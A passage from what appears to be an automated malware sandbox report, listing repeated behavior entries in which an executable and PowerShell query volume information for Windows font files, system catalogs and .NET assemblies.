                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
